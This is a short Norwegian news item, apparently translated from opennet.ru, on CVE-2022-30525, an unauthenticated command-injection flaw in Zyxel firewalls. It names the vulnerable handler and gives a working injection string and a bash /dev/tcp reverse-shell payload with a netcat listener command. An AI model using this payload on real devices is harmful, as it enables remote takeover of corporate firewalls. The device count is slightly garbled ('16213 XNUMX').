Sårbarhet i Zyxel-brannmurer som tillater kodekjøring uten autentisering

En kritisk sårbarhet (CVE-2022-30525) er identifisert i Zyxel-enheter i ATP-, VPN- og USG FLEX-serien, designet for å organisere driften av brannmurer, IDS og VPN i bedrifter, som lar en ekstern angriper kjøre kode på enhet uten brukerrettigheter uten autentisering. For å utføre et angrep må en angriper kunne sende forespørsler til enheten ved hjelp av HTTP/HTTPS-protokollen. Zyxel har fikset sikkerhetsproblemet i ZLD 5.30-fastvareoppdateringen. Ifølge Shodan-tjenesten er det for tiden 16213 XNUMX potensielt sårbare enheter på det globale nettverket som aksepterer forespørsler via HTTP/HTTPS.

Operasjonen utføres ved å sende spesialdesignede kommandoer til webhandleren /ztp/cgi-bin/handler, tilgjengelig uten autentisering. Problemet er forårsaket av mangelen på riktig opprydding av forespørselsparametere når du utfører kommandoer på systemet ved å bruke os.system-kallet som brukes i biblioteket lib_wan_settings.py og utføres når setWanPortSt-operasjonen behandles.

For eksempel kan en angriper sende strengen "; ping 192.168.1.210;" som vil føre til kjøring av kommandoen "ping 192.168.1.210" på systemet. For å få tilgang til kommandoskallet kan du kjøre "nc -lvnp 1270" på systemet ditt, og deretter starte en omvendt tilkobling ved å sende en forespørsel til enheten med '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Kilde: opennet.ru

Legg til en kommentar